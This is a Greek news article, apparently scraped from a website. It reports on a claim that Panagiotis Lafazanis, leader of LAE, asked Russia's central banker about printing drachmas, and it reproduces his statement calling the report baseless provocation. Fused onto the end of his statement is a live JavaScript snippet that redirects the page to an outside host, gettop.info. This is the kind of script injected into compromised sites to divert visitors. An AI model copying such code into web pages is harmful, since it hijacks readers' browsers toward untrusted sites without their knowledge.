Πάνε να φορτώσουν στον Λαφαζάνη τις…ρωσικές δραχμές

0
6

 

Κύκλοι του Σύριζα προσπάθησαν να επιρρίψουν στον επικεφαλής της ΛΑΕ, Παναγιώτη Λαφαζάνη, την ευθύνη για τις…ρωσικές δραχμές, γεγονός που προκάλεσε τη σφοδρότατη αντίδρασή του.

Ειδικότερα η  Εφημερίδα των Συντακτών, σε πρωτοσέλιδό της,  αναφέρει ότι ο πρώην υπουργός είχε ρωτήσει, παρουσία του Αλέξη Τσίπρα, τον Ρώσο κεντρικό τραπεζίτη αν τυπώνουν ξένα νομίσματα στη χώρα του, σε επίσκεψη κυβερνητικού κλιμακίου στην Αγία Πετρούπολη. Υπονοώντας, έτσι, ότι η Αθήνα σκεφτόταν να τυπώσει δραχμές σε νομισματοκοπείο της ρωσικής επικράτειας.

Ο κ. Λαφαζάνης διέψευσε κατηγορηματικά το δημοσίευμα, χαρακτηρίζοντάς το «ανυπόστατο» και κάνοντας λόγο για «προβοκάτσιες και παγίδες».

Το δημοσίευμα τον εμφανίζει να ρωτά τον τραπεζίτη της Ρωσίας «πώς μεταφέρουν τα νομίσματα στις ξένες χώρες;» και εκείνον να του απαντά χαριτολογώντας «ακόμη και με γαιδουράκια»…

Αναλυτικά η ανακοίνωση του Παναγιώτη Λαφαζάνη:

Το δημοσίευμα της ΕΦ.ΣΥΝ όσον αφορά τις “πληροφορίες” για το πρόσωπο μου είναι ανυπόστατο, υποβολιμαίο και δεν έχει καμιά σχέση με την πραγματικότητα.
Ουδέποτε ασχολήθηκα με την κοπή χρήματος είτε από το Νομισματοκοπείο, όπως κάποιοι συκοφατικά διέδιδαν παλιότερα, είτε από τη Ρωσία.
Οι στόχοι αυτής της παραφιλολογίας είναι απόλυτα κατανοητοί από το λαό.
Όσοι διοχετεύουν αυτές τις δήθεν “πληροφορίες” και κατασκευάζουν σενάρια δεν θέλουν να πλήξουν, όπως κακώς πιστεύουν ότι πλήττουν, μόνο το πρόσωπο μου άλλα πρώτα απ’ όλα και κυρίως το αίτημα που γίνεται όλο και πιο επιτακτικό για μετάβαση της χώρας μας στο εθνικό νόμισμα στη βάση ενός ριζοσπαστικού προγράμματος. Όπως θέλουν να πλήξουν και την ανάγκη να αποκτήσει η χώρα μας την εθνική της κυριαρχία και μια ανεξάρτητη πολυδιάστατη πολιτική διεθνών οικονομικών σχέσεων και εξωτερικών προσανατολισμών, πράγματα για τα οποία αγωνίζεται η ΛΑ.Ε., συναντώντας όλο και ευρύτερη λαϊκή απήχηση και δυναμική.
Κάνουν λάθος, όμως, όσοι πιστεύουν ότι με βρώμικες μεθοδεύσεις μπορούν να ανακόψουν μια αναπότρεπτη, έξω από τη φυλακή του ευρώ, αντιμνημονιακή πορεία της χώρας.
Να είναι βέβαιοι οι κύκλοι εκείνοι που διοχετεύουν δήθεν “πληροφορίες” σε μέσα ενημέρωσης, για να στήσουν προβοκάτσιες και παγίδες, πως θα είναι οι ίδιοι που θα πέσουν μέσα και θα τις πληρώσουν. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here